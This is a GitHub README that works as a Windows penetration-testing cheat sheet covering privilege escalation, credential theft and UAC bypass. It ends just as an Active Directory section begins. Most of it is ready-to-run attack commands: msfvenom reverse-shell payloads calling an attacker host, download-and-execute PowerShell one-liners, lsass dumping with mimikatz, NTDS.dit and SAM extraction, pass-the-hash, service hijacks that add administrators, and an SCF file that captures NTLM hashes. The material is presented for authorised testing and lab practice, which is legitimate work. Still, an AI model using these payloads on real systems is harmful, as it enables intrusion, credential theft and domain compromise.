https://github.com/txuswashere/pentesting-windows
Pentesting Windows
https://github.com/txuswashere/pentesting-windows
pentest pentest-scripts pentest-tools pentesting pentesting-tools pentesting-windows
Last synced: 9 months ago
JSON representation
Pentesting Windows
- Host: GitHub
- URL: https://github.com/txuswashere/pentesting-windows
- Owner: txuswashere
- Created: 2024-02-27T09:32:09.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2024-02-28T08:06:56.000Z (almost 2 years ago)
- Last Synced: 2025-03-25T14:45:35.211Z (10 months ago)
- Topics: pentest, pentest-scripts, pentest-tools, pentesting, pentesting-tools, pentesting-windows
- Homepage:
- Size: 152 KB
- Stars: 4
- Watchers: 1
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Pentesting Windows
# Gaining an Initial foothold
## Enumeration
### Nmap
Launch an nmap scan, my favorite is:
- `sudo nmap -T4 -sC -sV -p- --min-rate=1000 IP-ADR`
The `--min-rate` is so that the packets are sent faster than what is specified, `-sC` is for the scripts, it will use default scripts for enum and `-sV` is for services, `-p-` specifies we want all ports not only the top ones.
- `sudo nmap -T4 -sC -sV -O -Pn -p- IP-ADR`
## General tips about Windows
### Payloads types to Consider
- [DLLs](https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/dynamic-link-library) A Dynamic Linking Library (DLL) is a library file used in Microsoft operating systems to provide shared code and data that can be used by many different programs at once. These files are modular and allow us to have applications that are more dynamic and easier to update. As a pentester, injecting a malicious DLL or hijacking a vulnerable library on the host can elevate our privileges to SYSTEM and/or bypass User Account Controls.
- [Batch](https://commandwindows.com/batch.htm) Batch files are text-based DOS scripts utilized by system administrators to complete multiple tasks through the command-line interpreter. These files end with an extension of .bat. We can use batch files to run commands on the host in an automated fashion. For example, we can have a batch file open a port on the host, or connect back to our attacking box. Once that is done, it can then perform basic enumeration steps and feed us info back over the open port.
- [VBS](https://www.guru99.com/introduction-to-vbscript.html) VBScript is a lightweight scripting language based on Microsoft's Visual Basic. It is typically used as a client-side scripting language in webservers to enable dynamic web pages. VBS is dated and disabled by most modern web browsers but lives on in the context of Phishing and other attacks aimed at having users perform an action such as enabling the loading of Macros in an excel document or clicking on a cell to have the Windows scripting engine execute a piece of code.
- [MSI](https://docs.microsoft.com/en-us/windows/win32/msi/windows-installer-file-extensions) .MSI files serve as an installation database for the Windows Installer. When attempting to install a new application, the installer will look for the .msi file to understand all of the components required and how to find them. We can use the Windows Installer by crafting a payload as an .msi file. Once we have it on the host, we can run msiexec to execute our file, which will provide us with further access, such as an elevated reverse shell.
- [Powershell](https://docs.microsoft.com/en-us/powershell/scripting/overview?view=powershell-7.1) Powershell is both a shell environment and scripting language. It serves as Microsoft's modern shell environment in their operating systems. As a scripting language, it is a dynamic language based on the .NET Common Language Runtime that, like its shell component, takes input and output as .NET objects. PowerShell can provide us with a plethora of options when it comes to gaining a shell and execution on a host, among many other steps in our penetration testing process.
### Payload Transfer and Execution
- Impacket: [Impacket](https://github.com/SecureAuthCorp/impacket) is a toolset built-in Python that provides us a way to interact with network protocols directly. Some of the most exciting tools we care about in Impacket deal with psexec, smbclient, wmi, Kerberos, and the ability to stand up an SMB server.
- [Payloads All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md): is a great resource to find quick oneliners to help transfer files across hosts expediently.
- SMB: SMB can provide an easy to exploit route to transfer files between hosts. This can be especially useful when the victim hosts are domain joined and utilize shares to host data. We, as attackers, can use these SMB file shares along with C$ and admin$ to host and transfer our payloads and even exfiltrate data over the links.
- Remote execution via MSF: Built into many of the exploit modules in Metasploit is a function that will build, stage, and execute the payloads automatically.
- Other Protocols: When looking at a host, protocols such as FTP, TFTP, HTTP/S, and more can provide you with a way to upload files to the host. Enumerate and pay attention to the functions that are open and available for use.
# Windows Privesc
## Enumeration
- You can do some manual enumeration using Windows CMD powershell
- You can also do automatic enumeration using dedicated [tools (see the tools below)](#tools)
## Kernel Exploits
### What is a kernel
- [See the definition on Wikipedia](https://en.wikipedia.org/wiki/Kernel_(operating_system))
#### Windows kernel
- [Windows kernel in detail here](https://www.thewindowsclub.com/what-is-a-kernel-in-os-what-are-the-types-of-kernel)
### Kernel Exploits
- [Windows Kernel Exploits](https://github.com/SecWiki/windows-kernel-exploits)
#### Methodology
1. Enumerate win version / patch level (systeminfo)
2. Find matching exploits (Google, ExploitDB, GIthub)
3. Compile and run
**ATTENTION: Kernel exploits are often unstable and could crash the system**
### Famous kernel exploit
- MS08-067 - vulnerability in the "Server" service
- MS17-010 - EternalBlue - remote code execution vulnerability
- CVE-2021-36934 HiveNightmare - SeriousSam - Windows 10 flaw that results in ANY user having rights to read the Windows registry
### Enumeration and Exploitation Examples
- `icacls c:\Windows\System32\config\SAM` check perm on SAM file
- Exploit CVE-2021-36934 with this [poc](https://github.com/cube0x0/CVE-2021-36934) you will get hash and then will be able to get a shell for instance with psexec `psexec.py INLANEFREIGHT/administrator@10.129.43.13 -hashes aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54`
- Check for spooler service using powershell `ls \\localhost\pipe\spoolss`
- Add local admon with PrintNightmare with this [Powershell PoC](https://github.com/calebstewart/CVE-2021-1675)
- `Set-ExecutionPolicy Bypass -Scope Process`
- `Import-Module .\CVE-2021-1675.ps1`
- `Invoke-Nightmare -NewUser "username" -NewPassword "password123!" -DriverName "PrintIt"`
- Check if it worked `net user username`
- Check installed updates
- Powershell `systeminfo` `wmic qfe list brief` `Get-Hotfix`
- CMD with wmic `wmic qfe list brief`
- CVE-2020-0668
- Check out this blog [post](https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/)
- Use this [exploit](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668)
- Download it
- Open it with visual studio
- Build it
- Check for a third party serv that can be leverage. Check perm on a binary `icacls "c:\path\to\leverage-bin.exe"`
- Generate a malicious file `msfvenom -p windows/x64/meterpreter/reverse_https LHOST=ATTACK-IP LPORT=PORT -f exe > leverage-bin.exe`
- `python3 -m http.server 80` serve the binary
- Download 2 copy of the binary
- `wget http://ATTACK-IP/leverage-bin.exe -O leverage-bin.exe`
- `wget http://ATTACK-IP/leverage-bin.exe -O leverage-bin2.exe`
- Run the exploit `C:\CVE-2020-0668\CVE-2020-0668.exe C:\Users\user\Desktop\leverage-bin.exe "c:\path\to\leverage-bin.exe"`
- Check perm of new file `icacls 'c:\path\to\leverage-bin.exe'`
- Replace with malicious binary `copy /Y C:\Users\user\Desktop\leverage-bin2.exe "c:\path\to\leverage-bin.exe"`
- Use a Metasploit Resource Script
- Make a file named handler.rc and put this in it
```
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST
set LPORT 8443
exploit
```
- Launch metasploit this the resource script `msfconsole -r handler.rc`
- Start the service `net start leverage-serv`
- Even if we get an error we should have a reverse shell in meterpreter
### Tools
#### Executables
- [WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts.
- [Watson](https://github.com/rasta-mouse/Watson) is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.
- [Seatbelt](https://github.com/GhostPack/Seatbelt) C# project for performing a wide variety of local privilege escalation checks
- [SharpUp](https://github.com/GhostPack/SharpUp) C# version of PowerUp
- [JAWS](https://github.com/411Hall/JAWS)
#### PowerShell
##### Sherlock
[Sherlock.ps1](https://github.com/rasta-mouse/Sherlock) is a powershell script that will give exploit related to the target.
It can also be found here on kali if empire is installed `/usr/share/powershell-empire/empire/server/data/module_source/privesc/Sherlock.ps1`
- We can launch it with cmd like this (has to be served through an http server from the attacking machine)
`echo IEX(New-Object Net.WebClient).DownloadString('http://ATTACK-MACHINE-IP/Sherlock.ps1') | powershell -noprofile -`
- Launch from Powershell
```powershell
Set-ExecutionPolicy -ExecutionPolicy bypass -Scope CurrentUser
Import-module -Name C:\Absolute\Path\to\Sherlock.ps1
Find-AllVulns
```
##### PowerUp
[PowerUp](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc) is a powershell script for finding common Windows privilege escalation vectors that rely on misconfigurations. It can also be used to exploit some of the issues found.
```powershell
Set-ExecutionPolicy -ExecutionPolicy bypass -Scope CurrentUser
Import-module -Name C:\Absolute\Path\to\PowerUp.ps1
Invoke-AllChecks
```
##### JAWS
[JAWS](https://github.com/411Hall/JAWS) is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.
#### Other
##### Exploit Suggesters
[Windows Exploit Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) is a python script that will provide the list of vulnerabilities the OS is vulnerable to using systeminfo
[Here](https://www.jaacostan.com/2021/04/windows-exploit-suggester-next.html) is a blog post about wes next generation
- Here is a convenient command in wes to grep specifically for privesc exploit and have an output in color `python3 /opt/wesng/wes.py --color sysinfo.txt | grep -B 3 -A 5 "Privilege Vulnerability"`
[Metasploit Local Exploit Suggester](https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/)
##### Precompiled kernel exploits
- [Precompiled kernel exploits](https://github.com/SecWiki/windows-kernel-exploits)
##### SessionGopher
- [SessionGopher](https://github.com/Arvanaghi/SessionGopher) is a PowerShell tool that finds and decrypts saved session information for remote access tools. It extracts PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP saved session information.
##### LaZagne
- [LaZagne](https://github.com/AlessandroZ/LaZagne) is a tool used for retrieving passwords stored on a local machine from web browsers, chat tools, databases, Git, email, memory dumps, PHP, sysadmin tools, wireless network configurations, internal Windows password storage mechanisms, and more
##### Sysinternals Suite
- [Sysinternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) is a suite of tools that is used to monitor, manage and troubleshoot the Windows operating system owned by Microsoft. It is really useful for enumeration.
- [Security Update Guide](https://msrc.microsoft.com/update-guide/vulnerability)
#### Pre-compiled binaries.
It can be useful to have precompiled binaries just ready to run
- [GhostPack-Compiled Binaries - harmj0y](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries)
- [LaZagne releases](https://github.com/AlessandroZ/LaZagne/releases/)
## Unquoted Service Path Vulnerabilities
### What is it
Abuse of the research methodology of executable of windows. We will try to place an excutable in a location windows will be looking.
### Preresquisites
- We will need write permissions in an executable folder
- Check if the binary path is unquoted, we can check a service using `sc qc name-of-service`
- Check if we have writing rights with our user we can use [accesschk](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) `.\accesschk64.exe /accepteula -uwdq "C:\Program Files\"` we will have a list of user groups with read and write privs
- Use msfvenom to generate an executable file `msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACK-MACHINE-IP LPORT=7777 -f exe > executable_name.exe`
- Restart the service `sc start service-name `
### Methodology
- Enumerate with automatic tools or this command: `wmic service get name,displayname,pathname,startmode` (it will list the running services)
- Check if we can write in the folder of the service
### Enumeration with powerUp
- `powershell -ep bypass`
- `. .\PowerUp.ps1`
- `Invoke-AllChecks`
### Exploitation
- `msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe`
- We place the executable in the folder of the program we wish to abuse
- We start the vulnerable service in our example unquotedsvc `sc start unquotedsvc`
- we should be added as an administrator we can verify this using `net localgroup administrators`
## Runas
### What is it
- It is the possibility of running a command as another user
### Enumerate
- `cmdkey /list`
### How to exploit
- Check the writeup for Access on HTB to have an example of privesc using runas
## Autorun
### What is it
- It is when you abuse the fact that a program runs automatically
### Enumerate
- Check what programs have autorun using [Windows internals - autorun](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns) see example below
- Check that the program you found that allows FILE_ALL_ACCESS to Everyone using [Windows internals - accesschk](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) in our example we would type this in the cmd `C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"`
**OR**
- With [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1):
- In a win cmd type `powershell -ep bypass`
- Then `. .\PowerUp.ps1` to load powerUp
- `Invoke-AllChecks`
### How to exploit
- In kali
- `msfconsole`
- `use multi/handler`
- `set payload windows/meterpreter/reverse_tcp`
- `set lhost Your-Kali-IP-Address`
- `run`
- In another cmd tab `msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe` (give it the same name as the program that has autorun)
- Take the program you created with msfvenom in your target (python HTTP server and then the browser in your target)
- In your target
- Place the program in the directory where the autorun program is
- Wait for the administrator to log in
- You should have a shell in your kali in Metasploit
## Service Escalation - Registry
### What is it
- If we have admin rights of a registry key in service we could use this to make an executable run with a service (add a user, get a shell, ...)
### Enumeration
- In a powershell prompt type `Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl`
### How to exploit
- We will use this [C script](https://github.com/sagishahar/scripts/blob/master/windows_service.c)
- We will modify the whoami command: `system("whoami > c:\\windows\\temp\\service.txt");` we will add this instead `cmd.exe /k net localgroup administrators user /add` so our script now looks like this: `system("cmd.exe /k net localgroup administrators user /add");`
- We will compile it `x86_64-w64-mingw32-gcc windows_service.c -o x.exe`
- Let's now get the the exe file in our target (python http server -> browser in our target to dl the file) and put it where we have write rights (in the example it is going to be C:\Temp)
- In a cmd from our target `reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f`
- Now we just need to start the service `sc start regsvc`
- `net localgroup administrators` we can see that our user is now in the administrators group
## Escalation via Executable Files
### What is it
- Abusing an executable that we have permissions on
### Enumeration
- `powershell -ep bypass`
- `. .\PowerUp.ps1`
- `Invoke-AllChecks`
**OR**
- If we know what program it is we can just do `C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"` where File Permissions Service is the program we want to abuse
### How to exploit
- We will use this [C script](https://github.com/sagishahar/scripts/blob/master/windows_service.c)
- We will modify the whoami command: `system("whoami > c:\\windows\\temp\\service.txt");` we will add this instead `cmd.exe /k net localgroup administrators user /add` so our script now looks like this: `system("cmd.exe /k net localgroup administrators user /add");`
- We will compile it `x86_64-w64-mingw32-gcc windows_service.c -o x.exe`
- Let's now get the the exe file in our target (python http server -> browser in our target to dl the file) and put it where we have write rights (in the example it is going to be C:\Temp)
- In the target cmd `copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"`
- `sc start filepermsvc`
- Our user should be in the local administrators group
## Startup Applications
### What is it
- We will abuse a program that is launched on startup in which we have rights
### Enumeration
- We can enumerate using [Windows internals - icacls](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls) `icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"`
- The `BUILTIN/Users` group has full acces `(F)` to the Startup directory
### How to exploit
- In our attack machine `msfconsole` we launch Metasploit
- `use multi/handler`
- `set payload windows/meterpreter/reverse_tcp`
- `set lhost IP-OF-OUR-ATTACK-MACHINE`
- `run`
- In another tab `msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP-OF-OUR-ATTACK-MACHINE -f exe -o x.exe`
- We serve the executable in our target (python http server -> and browse to it from our target)
- We put the file in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" (If you are in the explorer you may have to type ProgramData in the path if it does not appear).
- We wait for an admin to log in
- We should have a shell in metasploit
## DLL Hijacking
### What is it
- DLL is a dynamic Library they often run with executables, when an executable runs the system will look for the dll and if the dll does not exist we could replace it with one of our own.
### Enumeration
- We can find it using procmon, we need to add 2 filters "Result is NAME NOT FOUND" and "PATH ends with .dll"
- This will list the dll not found
- We will need write access to the folder where the dll are missing
### How to exploit
- We are going to use [windows_dll.c](https://github.com/sagishahar/scripts/blob/master/windows_dll.c)
- Edit the file and modify the system command to add our user to the admin goup which would look like this: `system("cmd.exe /k net localgroup administrators user /add");`
- We can now compile it `x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll`
- We serve it to our target (python http server -> browser of our target)
- We put it in the path where the system will look for it, in our example it is the temp folder
- We restart the service `sc stop dllsvc & sc start dllsvc`
- Our user should be in the admin group now
## Binary path
### Enumeration
- PowerUP we should see the service exploitable under the `[*] Checking service permissions`
**OR**
- We can use [accesschk](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) `accesschk64.exe -wuvc Everyone *`
- Will list service we can write and to which everyone has access (in our example the service is daclsvc)
### Exploitation
- `sc config daclsvc binpath= "net localgroup administrators user /add"`
- `sc start daclsvc`
- We should be added to the administrators group `net localgroup administrators`
## Escalation via User Privileges
### SeDebugPrivilege
#### Enumeration
- `whoami /priv` the `SeDebugPrivilege` should be listed
#### Exploitation
- `procdump.exe -accepteula -ma lsass.exe lsass.dmp` We will use ProcDump from the SysInternals suite to leverage this privilege and dump the lsass process memory.
- We can launch mimikatz from our target
- `mimikatz.exe`
- `log`
- `sekurlsa::minidump lsass.dmp`
- `sekurlsa::logonpasswords`
- And now we can take the hashes we need
- If mimikatz does not work and if we have RDP we can dump lsass from the taskmanager (tab "Details" right click on the lsass process and select "Create dump file"
- We can then take the dump to our attack machine et use pypykatz
- `pypykatz lsa minidump lsass.DMP`
### SeTakeOwnershipPrivilege
- With this privilege, a user could take ownership of any file or object and make changes that could involve access to sensitive data, Remote Code Execution (RCE) or Denial-of-Service (DOS). In this case we need a file to target.
#### Enumeration
- `whoami /priv` SeTakeOwnershipPrivilege should be listed
#### Exploitation
- If necessary enable the privilege using [this script](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1)
- `Import-Module .\Enable-Privilege.ps1`
- `.\EnableAllTokenPrivs.ps1`
- Take ownership of a flag using [takeown](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown) `
- Check the change of ownership worked `PS C:\htb> Get-ChildItem -Path 'C:\Path\To\File' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}`
- Modify the file ACL with [icalcs](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls) `icacls 'C:\Path\To\File' /grant user:F`
- Use the file you have ownership now! :D
## Privesc via Group Privileges
### Backup Operators
#### SeBackupPrivilege
- This allows us to copy a file from a folder
- [Here](https://github.com/giuliano108/SeBackupPrivilege) is a poc to abuse this
- We need to import the libs `Import-Module .\SeBackupPrivilegeUtils.dll` and `Import-Module .\SeBackupPrivilegeCmdLets.dll`
- `whoami /priv` to check if we have the SeBackupPrivilege
- It is disabled so we can enable it with `Set-SeBackupPrivilege`
- We can now copy protected files and then use them `Copy-FileSeBackupPrivilege 'c:\path\to\file\file.txt' .\file.txt`
##### Copying NTDS.dit (for DC)
- This group will also let us logging in locally to a domain controller.
- NTDS is the active directory database it contains the ntlm hashes of all users and computers in the domain
- We can use [diskshadow](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow) to make a copy of the drive `diskshadow.exe`
```
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
```
- Then we just need to copy it with the SeBackupPrivilege `Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\paht\to\destination\ntds.dit`
##### Backing up SAM and SYSTEM
- `reg save HKLM\SYSTEM SYSTEM.SAV`
- `reg save HKLM\SAM SAM.SAV`
##### Extract the creds
- We can use secretdumps `secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL` or the ps module DSInternals
```
PS C:\user> Import-Module .\DSInternals.psd1
PS C:\user> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\user> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=domain,DC=local' -DBPath .\ntds.dit -BootKey $key
```
- *Note: We can also use [robocopy](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/robocopy) to copy the files*
### Event log readers
- `net localgroup "Event Log Readers"`
- `wevtutil qe Security /rd:true /f:text | Select-String "/user"` search Security logs (credentials could be dropped this way)
- `Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}` Another way to do the same thing
- It is also worth to check PowerShell Operational logs
### DnsAdmins
- Using this group privileges, it is possible to use [dnscmd](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd) to specify the path of a DLL plugin.
- `Get-ADGroupMember -Identity DnsAdmins` to confirm group membership
- `msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll` we generate a dll with msfvenom that will add a user or we can make one that will get us a shell as admin `msfvenom -p windows/shell/reverse_tcp LHOST=tun0 LPORT=4444 -f dll -o shell.dl`
- Do not forget to launch a listener if you use the reverse shell `rlwrap nc -lnvp 4444`
- Serve the dll using python web server `python3 -m http.server 80`
- Download the file in the target `wget "http://Attacking-machine-IP/adduser.dll" -outfile "adduser.dll"` (in powershell)
- `dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll` load custom dll (in CMD)
- `sc stop dns`
- `sc start dns`
- `net group "Domain Admins" /dom` check that we have the priv (or catch the shell)
### Hyper-V Administrators
- CVE-2018-0952
- CVE-2019-0841
- [Hyper V admin EOP - decoder it](https://github.com/decoder-it/Hyper-V-admin-EOP/blob/master/hyperv-eop.ps1)
- Has been mitigated since March 2020
### Print Operators
- We need to check for the `SeLoadDriverPrivilege` in a cmd shell launched as admin `whoami /priv`
- We download this [tool](https://raw.githubusercontent.com/3gstudent/Homework-of-C-Language/master/EnableSeLoadDriverPrivilege.cpp) to enable the privilege. We need to add the few lines at the begining of the script
```
#include
#include "tchar.h"
```
- We can then compile it using cl.exe from a visual studio cmd `cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp`
- We then have to download the [Capcom.sys](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys) driver file
- We can then add the reference to the drive `reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"`
- In powershell we check that the Capcom driver is not loaded with [DriverView.exe](http://www.nirsoft.net/utils/driverview.html)
- `.\DriverView.exe /stext drivers.txt`
- `cat drivers.txt | Select-String -pattern Capcom`
- Now we need to check it has been enabled
- Finally we can launch the exploit using [ExploitCapcom.exe](https://github.com/tandasat/ExploitCapcom) it will launch a shell as authority system
### Server Operators
- With this group you will get the`SeBackupPrivilege` and `SeRestorePrivilege`
- `sc qc AppReadiness`
- We can check permissions with sysinternals [PsService](https://docs.microsoft.com/en-us/sysinternals/downloads/psservice)
- `c:\PsService.exe security AppReadiness`
- Modify service binary path `sc config AppReadiness binPath= "cmd /c net localgroup Administrators current-user /add"`
- `sc start AppReadiness` Start the service (will fail)
- We should be in the Admin group `net localgroup Administrators`
- We can now retrieve creds with crackmapexec `crackmapexec smb IP-ADDRESS -u current-user -p 'current password'`
- Dump hash and pass `secretsdump.py current-user@IP-ADDRESS -just-dc-user administrator`
- We can then get an admin shell using the found hashes `psexec.py INLANEFREIGHT/administrator@IP-ADDRESS -hashes aad3b435b51404eeaad3b435b51404ee:7796ee39fd3a9c3a1844556115ae1a54 `
## Privesc via OS attacks
### UAC Bypass
- `REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA` confirm UAS is enabled
- `REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin` Checking UAC Level
- If `ConsentPromptBehaviorAdmin` is 0x5 it means the highest UAC level of `Always notify` is enabled
- `[environment]::OSVersion.Version` check win OS version compare with version history [here](https://en.wikipedia.org/wiki/Windows_10_version_history)
- List of UAC bypass [here](https://github.com/hfiref0x/UACME)
- `msfvenom -p windows/shell_reverse_tcp LHOST=IP_ADDRESS-OF_ATTACK_MACHINE LPORT=PORT -f dll > srrstr.dll` generate a malicious dll
- `python3 -m http.server 80` serve it to the target
- `curl http://IP-ATTACK-MACHINE/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"` get it on the target
- `nc -lvnp CHOSEN-PORT` launch listener
- `rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll` run the dll to get the reverse shell back and check if uac is enabled for our current user
- `C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe` execute this to get an elevated shell
### Weak permissions
#### Permissive ACLs
- `.\SharpUp.exe audit` to enumerate
- If you detect an executable that you could abuse you can check the permissions with [icacls](https://ss64.com/nt/icacls.html) `icacls "C:\Path\to\file.exe"`
- Make a back up of the original binary and replace it with a malicious one generated by msfvenom `msfvenom -p windows/shell/reverse_tcp LHOST=tun0 LPORT=8888 -f exe > file.exe` (instead of shell name it with the name of the executable that you are abusing
- Set up a listener `nc -lnvp 8888`
- `cmd /c copy /Y file.exe "C:\Path\to\file.exe"` copy the exec instead of the original one
- `sc start file` start the service
- Get your shell
- If you want to exploit it by adding a user `msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators user /add" -f exe > file.exe`
#### Weak Service permissions
- `.\SharpUp.exe audit` to enumerate
- Check permissions on the file you might be able to abuse using win internals [AccessChk](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) `accesschk.exe /accepteula -quvcw service`
- `sc config service binpath="cmd /c net localgroup administrators user /add"` change the service binary path
- `sc stop service` stop the service
- `sc start service` start the service (it will fail but our exploit will work)
- `net localgroup administrators` check that you user is now admin
- To clean up
- `sc config WindScribeService binpath="C:\Path\to\service.exe"` revert binary path
- `sc start service` start the service
- `sc query service` check that service is running
## Privesc with found credentials
### Browser Credentials
- We can use [SharpChrome](https://github.com/GhostPack/SharpDPAPI) to retrive cookies and saved logins from Google Chrome
- We can use [lazagne](https://github.com/AlessandroZ/LaZagne) to dump passwords from the system `.\lazagne.exe all`
## Other ways to privesc
### Interact with users
- Capture traffic if wireshark is installed
- Process monitoring
```
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
```
- `IEX (iwr 'http//IP-OF-ATTACK-MACHINE/procmon.ps1')` execute the script from our target with the code hosted in our attacking machine
- Vulnerable service abuse
- Shell Command File on File Share to capture ntlmv2 pass hash.
- We need an interesting share writable by our user `accesschk -s -w C:\folder-of-shares`
- Create a malicious SCF file and name it with an @ at the start for example `@Inventory.scf`
```
[Shell]
Command=2
IconFile=\\ATTACK-IP\share\legit.ico
[Taskbar]
Command=ToggleDesktop
```
- We then just need to start Responder
- `sudo responder -wrf -v -I INTERFACE-USED` (your interface can be tun0 for instance it has to be one reachable by the target)
- Finally we can crack the found hash with hashcat `hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt`
## Privesc on Legacy OS
### Windows Server 2008
- `wmic qfe` will show missing KBs
- We can use [Sherlock](https://github.com/rasta-mouse/Sherlock) to find the vulnerabilities the target might have.
- On powershell `Set-ExecutionPolicy bypass -Scope process`
- `Import-Module .\Sherlock.ps1`
- `Find-AllVulns`
- Get a meterpreter shell
- `msfconsole`
- `search smb_delivery` you should see this one `0 exploit/windows/smb/smb_delivery 2016-07-26 excellent No SMB Delivery`
- `use 0`
- `show options` set srvhost and lhost to your attack machine
- set the target to DLL (`show targets` `set target 0`
- `exploit`
- Paste the comand shown on msf in the target
- Receive the shell
- Find a local privesc exploit
- For example we can use CVE 2010-3338
- on metasploit `search 2010-3338` you should see `0 exploit/windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation`
- Migrate the process
- Backgound the session `background`
- `set session 1`
- set lhost to your attacking machine IP
- set lport to a free prot
- `exploit`
- You should get an elevated shell
### Windows Desktop 7
- Gather `systeminfo` and use [windows exploit suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
- `python2.7 windows-exploit-suggester.py --update` this will dl a database file in xls format that you can use
- `python2.7 windows-exploit-suggester.py --database 2022-04-30-mssb.xls --systeminfo systeminfo`
- Example of MS16-032 with this [poc](https://www.exploit-db.com/exploits/39719)
- In Powershell `Set-ExecutionPolicy bypass -scope process`
- `Import-Module .\exploit.ps1`
- `Invoke-MS16-032`
- We will get an elevated shell
## Checklists
- [Hacktricks](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation)
- [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
## Resources
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
- https://github.com/TCM-Course-Resources/Windows-Privilege-Escalation-Resources
- https://github.com/gtworek/Priv2Admin
- https://github.com/hfiref0x/UACME
# Active Directory
## Local Authentication
Local authentication is done using the Local Security Authority (LSA). LSA is a protected subsystem that keeps track of the security policies and the accounts that are on a computer system. It also maintains information about all aspects of local security on a computer.
## Physical Components
### Domain Controllers
